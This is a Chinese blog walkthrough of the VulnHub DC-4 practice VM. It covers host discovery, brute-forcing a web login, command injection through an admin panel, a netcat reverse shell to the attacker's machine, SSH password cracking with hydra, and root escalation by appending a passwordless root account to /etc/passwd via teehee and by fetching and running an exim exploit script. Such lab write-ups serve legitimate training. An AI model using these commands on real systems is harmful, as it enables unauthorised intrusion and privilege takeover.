[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)

最新推荐文章于 2024-04-29 01:17:30 发布
最新推荐文章于 2024-04-29 01:17:30 发布
阅读量1.1k 收藏 10
点赞数 4
分类专栏: vulnhub 综合靶场通关之路 文章标签: vulnhub靶机通关篇 DC-4 通关详解 渗透测试靶机详解 一起来打靶 渗透测试靶机搭建
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/129479752
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、环境搭建:

1、靶场描述

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

只有一个flag

2、下载靶场环境

靶场下载地址:

https://www.vulnhub.com/entry/dc-4,313/

下载下来的文件如下

在这里插入图片描述

3、启动靶场环境

下载下来是虚拟机压缩文件,直接用Vmvare导入就行。

在这里插入图片描述

设置虚拟机名称

在这里插入图片描述

导入中

在这里插入图片描述

导入完成之后打开后把网络模式设置为NAT模式。

在这里插入图片描述

虚拟机开启之后界面如下,我们不知道ip,需要自己探活,网段知道:192.168.233.0/24

在这里插入图片描述

二、渗透靶场

1、目标:

目标就是我们搭建的靶场,靶场IP为:192.168.233.0/24

2、信息收集:寻找靶机真实IP

使用nmap进行探活,寻找靶机ip

nmap -sP 192.168.233.0/24

在这里插入图片描述

也可以使用arp-scan进行探活,寻找靶机ip

arp-scan -l

在这里插入图片描述

本机ip为192.168.233.130
所以分析可得靶机ip为192.168.233.180

192.168.233.1		vm8网卡
192.168.233.2		网关
192.168.233.179	靶机
192.168.233.254	DHCP服务器
192.168.233.130	kali本机

3、信息收集:探端口及服务

使用nmap探活端口

nmap -A -p- -v 192.168.233.180

在这里插入图片描述
在这里插入图片描述

发现开放了22端口,存在ssh服务,OpenSSH 7.4p1
发现开放了80端口,存在web服务,nginx 1.15.10
也可以使用masscan探活端口

masscan --rate=10000 --ports 0-65535 192.168.233.180

在这里插入图片描述

然后进行web指纹识别

whatweb -v 192.168.233.180

在这里插入图片描述

4、目录爆破

只发现登录框

在这里插入图片描述

5、访问web服务

http://192.168.233.180/

在这里插入图片描述

发现是一个登录框,我们第一反应就是能不能爆破出弱口令,然后就是有没有可能使用万能密码

6、爆破账号密码

这里使用bp尝试获取弱口令
Bp抓个包,发送到爆破模块

在这里插入图片描述

设置好爆破点

在这里插入图片描述

导入优秀的字典
我使用的字典

https://pan.baidu.com/s/1fMyJSuftvT3NSOjA7BkT-A?pwd=uiwr

账号我导入了一个常用用户名

在这里插入图片描述

密码我导入了一个top1000

在这里插入图片描述

开始爆破

在这里插入图片描述

爆破中

在这里插入图片描述

爆破结果如下:
发现admin/happy这一组返回包长度最长,猜想他就是账号密码

在这里插入图片描述

使用admin/happy登录成功

在这里插入图片描述

7、发现任意命令执行

发现它有一个命令,我们点进去看一下

在这里插入图片描述

发现这里可以执行三种命令
点击list files好像是执行了ls -l

在这里插入图片描述

点击run抓个包看一下
发现真的是执行了ls -l

在这里插入图片描述

发现执行了ls并回返值,猜想能不能执行任意命令
把抓到的包放入重放攻击模块修改命令进行重放攻击
由上面ls -l拼接方式看,我们可以知道空格使用+代替
执行ls

在这里插入图片描述

执行whoami

在这里插入图片描述

执行id

在这里插入图片描述

执行ip+add

在这里插入图片描述

由上面的测试可知确实存在任意命令执行,空格由+代替

8、反弹shell到kali

1.攻击机监听

nc -lvvp 55555

Nc反弹shell详解在文末给出链接

在这里插入图片描述

2.靶机连接

连接命令

nc 192.168.233.130 55555 -e /bin/bash

经过+拼接如下

nc+192.168.233.130+55555+-e+/bin/bash

在这里插入图片描述

3.反弹shell成功

在这里插入图片描述

执行ls

在这里插入图片描述

9、进入交互式shell

都知道上面的到的shell不好用,我们进入交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

10、teehee提权

这个靶机可以使用exim4提权也可以使用teehee提权,两种提权方式选择一种即可,这里我两种提权方式都有些到

1、查看当前权限

查看当前权限,不是root权限

id 
Whoami

在这里插入图片描述

2、发现old-passwords.bak文件

查看系统里面有什么文件
在/home/jim/backups下看到一个old-passwords.bak文件,看名字应该是一堆密码,而且是jim用户使用过的密码

在这里插入图片描述

打开看一下发现一堆密码

在这里插入图片描述

感觉可以做爆破字典
把文件保存下来

在这里插入图片描述

3、爆破出jim的ssh密码

使用hydra爆破一下ssh密码

hydra -l jim -P /root/Desktop/old-passwords.bak.txt 192.168.233.180 ssh

用户名为jim,密码为我们保存的old-passwords.bak.txt

在这里插入图片描述

果然爆破出一个一对用户密码

jim/jibril04

使用kali登录jim

ssh jim@192.168.79.132

密码是jibril04
成功登录jim用户

在这里插入图片描述

4、发现charles用户密码

继续探索
在/var/spool/mail目录下发现一封名为jim的邮件
邮件内容大致为:
我今天要去度假了,所以老板让我给你我的密码,以防有什么事情发生错了。
也就是说这里我们又拿到了一个用户名和密码

Charles/^xHhA&hvim0y

在这里插入图片描述

直接su 切换用户试试

su Charles

提示没有这个用户名,那很明显首字母我们需要小写

su charles

然后输入密码

^xHhA&hvim0y

在这里插入图片描述

成功用su命令切换到用户charles

5、teehee提权

1、查看使用sudo运行的命令

sudo -l

看到一个teehee提权,我们可以用teehee写一些信息到/etc/passwd里面

在这里插入图片描述

2、执行如下命令进行提权:

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

命令的意思大致利用teehee为把如下信息写到/etc/passwd里面,在用户名admin 没有密码为管理员权限,进入的时候运行/bin/bash
3、/etc/passwd 内每个字段含义如下

admin::0:0:::/bin/bash
username:password:User ID:Group ID:comment:home directory:shell

4、成功提权为root

在这里插入图片描述

11、exim4提权

这个靶机可以使用exim4提权也可以使用teehee提权,两种提权方式选择一种即可,这里我两种提权方式都有些到

1、查看当前权限

查看当前权限,不是root权限

id 
whoami

在这里插入图片描述

2、发现可以用exim4进行提权

看看具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null

发现exim4命令具有SUID权限,exim4是可以用来提权的

在这里插入图片描述

查看查看exim4版本,发现exim4版本为4.89

exim4 --version

在这里插入图片描述

3、寻找exim4提权脚本

1、本地漏洞库查找exim 4漏洞

searchsploit exim 4

exim4版本为4.89,发现有好几个可以用,还有两个提权,这里我们选用46996

在这里插入图片描述

4、上传提权脚本到靶机

开启apache服务

systemctl start apache2.service

将选用的46996拷贝到kali的apache web页面下

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

在这里插入图片描述

访问kali服务下载提权脚本

http://kali-ip/46996.sh

DC-4下载提权脚本

wget http://192.168.233.130/46996.sh

提示可以访问,但拒绝访问,可能是目录权限不够,尝试切换到/tmp目录进行下载

在这里插入图片描述

cd /tmp
wget http://192.168.233.130/46996.sh

成功下载提权脚本

在这里插入图片描述

5、exim4提权

我们已经上传了提权脚本到靶机,接下来我们需要运行脚本进行提权

ls -l

在这里插入图片描述

查看脚本权限,发现没有执行权限,我们需要给脚本加执行权限

chmod +x 46996.sh

在这里插入图片描述

执行脚本

./46996.sh

在这里插入图片描述

成功提权为root权限

在这里插入图片描述

发现flag

在这里插入图片描述

12.发现flag.txt

有了root权限,我们切换到root目录下,查看文件,发现flag.txt文件

cd /root
ls
cat flag.txt

在这里插入图片描述

三、相关资源

1、靶场下载地址
2、[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
3、[ 常用工具篇 ] burpsuite_pro 安装配置详解(附安装包)
4、arp-scan
5、文中用到的字典
6、nmap
7、masscan
8、whatweb
9、实现交互式shell的几种方式
10、[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
11、提权辅助工具集合
12、简谈SUID提权
13、[ 常用工具篇 ] AntSword 蚁剑安装及使用详解

_PowerShell
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
靶场DC-4
好好学习
11-28 721
每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!针对DC系列的靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。
看完这 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4588
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub靶机:DC-4渗透详细过程
最新发布
菜鸟学渗透
04-29 348
Vulnhub靶机:DC-4渗透详细过程
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 247
这个靶机难度较为简单,可以简单练手
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1583
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC4靶场通关详细记录】
博客
12-17 1106
DC4靶场通关记录】-----扫描器AWVS的使用;命令执行漏洞的利用;hydra爆破ssh的密码;teehee提权方法
DC渗透系列】DC-4靶场
xydsg的博客
02-05 713
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限。存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell。转换用户,发现一个teehee用户可以使用root无密码权限。teehee可以通过修改该文件达到添加用户的效果,文件格式为。linux的邮件目录是/var/spool/mail。抓个包,发现ls -l命令是radio参数后的值。把里面的密码取出来存着先 命名为jim.txt。backups里面有老密码,mbox不够权限。我们可以使用keehee添加root权限用户。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
渗透DC-4靶机实战笔记
qq_43571759的博客
03-30 412
渗透DC-4靶机实战笔记 试验环境: 靶机环境:DC-4 攻击机:kali 扫描同网段存活主机、开放端口,寻找突破点; 存活主机IP地址是192.168.11.140 扫描其主机信息和开放端口号,开放了22号端口可以考虑爆破。 也开放80号端口,web服务器是nginx1.15 访问是这样的,大概知道渗透这个靶机是考验我们的爆破技术了吧,这里习惯性的先尝试了一下弱口令不成功,这里我准备在虚拟机...
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 666
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机的攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-4靶机渗透
weixin_45349299的博客
12-21 991
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
渗透实战-vulnhub-DC-4
qq_52263650的博客
04-17 200
渗透实战-vulnhub-DC-4
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3447
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
DC-4 靶场学习
akxnxbshai的博客
03-03 464
DC-4靶场学习。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_PowerShell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值